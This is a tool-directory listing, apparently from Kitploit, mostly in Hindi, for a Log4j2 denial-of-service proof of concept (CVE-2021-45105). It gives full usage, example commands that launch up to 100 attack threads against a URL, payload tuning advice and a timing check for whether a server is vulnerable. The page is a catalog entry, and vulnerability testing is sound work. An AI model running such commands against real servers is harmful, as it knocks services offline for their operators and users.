Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2_dos_exploit — log4j2 DoS शोषण, CVE-2021-45105 शोषण, सेवा अस्वीकृति PoC | Kitploit
उपकरण/GitHubGitHub/iamsoscared/log4j2_dos_exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubiamsoscared/log4j2_dos_exploit

log4j2_dos_exploit

log4j2 DoS शोषण, CVE-2021-45105 शोषण, सेवा अस्वीकृति PoC

रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos भेद्यता शोषण स्क्रिप्ट

CVE-2021-45105 Exploit

CVE-2021-45105 शोषण स्क्रिप्ट

उपयोग विधि how to use

English:

root@kitploit:~
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	  attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	  get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

-l (--loop) मान को परिदृश्य के अनुसार अलग-अलग सेट करने की आवश्यकता होती है, बड़ा हमेशा बेहतर नहीं होता। यदि यह वेब सर्वर द्वारा स्वीकार की जा सकने वाली लंबाई से अधिक हो जाता है, तो यह आक्रमण जांच को विफल कर सकता है और कोई आक्रमण प्रभाव नहीं होगा।

आउटपुट प्रारूप:

[+] सामान्य समय:0.11111

[+] आक्रमण समय:2.00000

यदि आक्रमण समय - सामान्य समय > 1 या कुछ और, तो शायद भेद्यता मौजूद है, आक्रमण थ्रेड सेट करने के लिए -t पैरामीटर का उपयोग कर सकते हैं।

中文:

root@kitploit:~
 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻击目标
-m,--method    默认为get,http方式,仅支持get和post
-d,--data   	 get或post请求参数,json格式,如:{\"username\":\"\"}
-H,--header    请求头, json格式, 如:{\"user-agent\":\"\"}
-l,--loop    	 默认为100,payload循环长度,根据参数在不同的位置,设置不同的数值,如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次。攻击线程。

常见用法:
# 默认get,100个payload循环,攻击探测一次,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
# 默认get,设置500个payload循环,发起100个攻击线程,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
# 指定POST,设置500个payload循环,攻击探测一次,在username参数中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
# 指定POST,设置500个payload循环,发起100个攻击线程,在user-agent请求头中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
# 指定POST,设置500个payload循环,攻击探测一次,在username参数和user-agent请求头中添加攻击payload
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

-l (--loop) मान को परिदृश्य के अनुसार अलग-अलग सेट करने की आवश्यकता होती है, बड़ा हमेशा बेहतर नहीं होता। यदि यह वेब सर्वर द्वारा स्वीकार की जा सकने वाली लंबाई से अधिक हो जाता है, तो यह आक्रमण जांच को विफल कर सकता है और कोई आक्रमण प्रभाव नहीं होगा।

आउटपुट प्रारूप:

[+] सामान्य समय:0.11111

[+] आक्रमण समय:2.00000

यदि आक्रमण समय में बड़ी देरी होती है, तो भेद्यता मौजूद है, आक्रमण थ्रेड सेट करने के लिए -t पैरामीटर का उपयोग कर सकते हैं।

अस्वीकरण

कृपया अवैध उद्देश्यों के लिए उपयोग न करें, केवल सीखने और संदर्भ के लिए। किसी भी अवैध गतिविधि का मुझसे कोई संबंध नहीं है।

(खराब अंग्रेजी, अनुवाद का उपयोग नहीं किया, जैसा है वैसे देखें।)

By:我超怕的

टूल डाउनलोड करें